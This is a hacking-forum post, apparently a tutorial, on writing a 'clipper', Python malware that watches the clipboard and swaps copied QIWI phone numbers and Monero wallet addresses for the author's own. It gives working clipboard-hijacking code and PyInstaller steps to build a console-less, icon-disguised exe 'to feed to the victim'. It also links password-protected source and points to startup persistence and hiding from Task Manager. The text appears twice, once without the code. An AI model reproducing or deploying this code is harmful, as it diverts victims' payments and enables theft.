Lord777
Professional
- Messages
- 2,577
- Reaction score
- 1,561
- Points
- 113
Today we will try ourselves as a malware developer by creating a simple clipper for qiwi, poison, monero.
Foreword
Clipper is a virus that monitors the clipboard of an infected PC for the details of electronic wallets and, if such are displayed, replaces the data in the buffer with those specified by the creator.
For example:
Let's say you have a clipper dropped on your pc. For example, you need to pay for a service or conduct a transaction. You copy the wallet number (it doesn't matter what it is: crypt, poison, webmoney, qiwi), after you copy the wallet number, the clipper will replace the copied wallet to the creator's wallet. The money flew away in an unknown direction and it is almost impossible to prove anything to anyone. PROFIT!
Let's move on to practice
Installing Python
Follow the link. Download the latest version and install it.
Coding
Let's import the modules we need:
Declaring variables
The main part of the code
Compile to exe to feed our code to the victim
Let's use the PyInstaller program. It can be installed thanks to the command we need to enter in the CMD: pip install pyinstaller. Here are the Pyinstaller arguments we'll be using:
1) -F, will collect all files into one exe file.
2) -w, will disable the console.
3) -i *** path to the icon ***, an argument that will connect the icon to the program.
Final command for CMD: pyinstaller -F -w -i *** path to icon *** *** path to .py file ***.
Source codes
Download link: https://filecloud.me/ydcox8pbql7p.html
Password: h0peIess
You can also find on the Internet the source codes of the scripts that will add this virus to StartUp, will be hidden from the Task Manager.
Foreword
Clipper is a virus that monitors the clipboard of an infected PC for the details of electronic wallets and, if such are displayed, replaces the data in the buffer with those specified by the creator.
For example:
Let's say you have a clipper dropped on your pc. For example, you need to pay for a service or conduct a transaction. You copy the wallet number (it doesn't matter what it is: crypt, poison, webmoney, qiwi), after you copy the wallet number, the clipper will replace the copied wallet to the creator's wallet. The money flew away in an unknown direction and it is almost impossible to prove anything to anyone. PROFIT!
Let's move on to practice
Installing Python
Follow the link. Download the latest version and install it.
Coding
Let's import the modules we need:
Code:
from win32clipboard import *
from time import sleep
import osDeclaring variables
Code:
my_qiwi = *** QIWI ***
my_monero_poloniex = ***MONERO_POLONIEX***The main part of the code
Code:
while True: # Canned loop
OpenClipboard () # Open the clipboard
data = GetClipboardData () # Read data from the clipboard
CloseClipboard () # Close the clipboard (the rules are xD)
if len (data) == 12: # If the length is 12 characters, it may be a phone number RU
if (data.startswith ("+ 79") or data.startswith ("79") or data.startswith ("89")): # If the text starts with "+79", "79", "89", then we change it
OpenClipboard () # Open the clipboard
EmptyClipboard () # Clear the clipboard
SetClipboardText (my_qiwi) # Change the text
CloseClipboard () # Close the clipboard
sleep (0.1) # Break, because if we constantly open the clipboard, an error will be thrown: "Access denied"
if data.startswith ("4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk"): # If the text starts with "4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk", then this is exactly the Monero Poloniex wallet number
OpenClipboard () # Open the clipboard
EmptyClipboard () # Clear the clipboard
SetClipboardText (my_monero_poloniex) # Change the text
CloseClipboard () # Close the clipboard
sleep (0.1) # Break, because if we constantly open the clipboard, an error will be thrown: "Access denied"Compile to exe to feed our code to the victim
Let's use the PyInstaller program. It can be installed thanks to the command we need to enter in the CMD: pip install pyinstaller. Here are the Pyinstaller arguments we'll be using:
1) -F, will collect all files into one exe file.
2) -w, will disable the console.
3) -i *** path to the icon ***, an argument that will connect the icon to the program.
Final command for CMD: pyinstaller -F -w -i *** path to icon *** *** path to .py file ***.
Source codes
Download link: https://filecloud.me/ydcox8pbql7p.html
Password: h0peIess
You can also find on the Internet the source codes of the scripts that will add this virus to StartUp, will be hidden from the Task Manager.
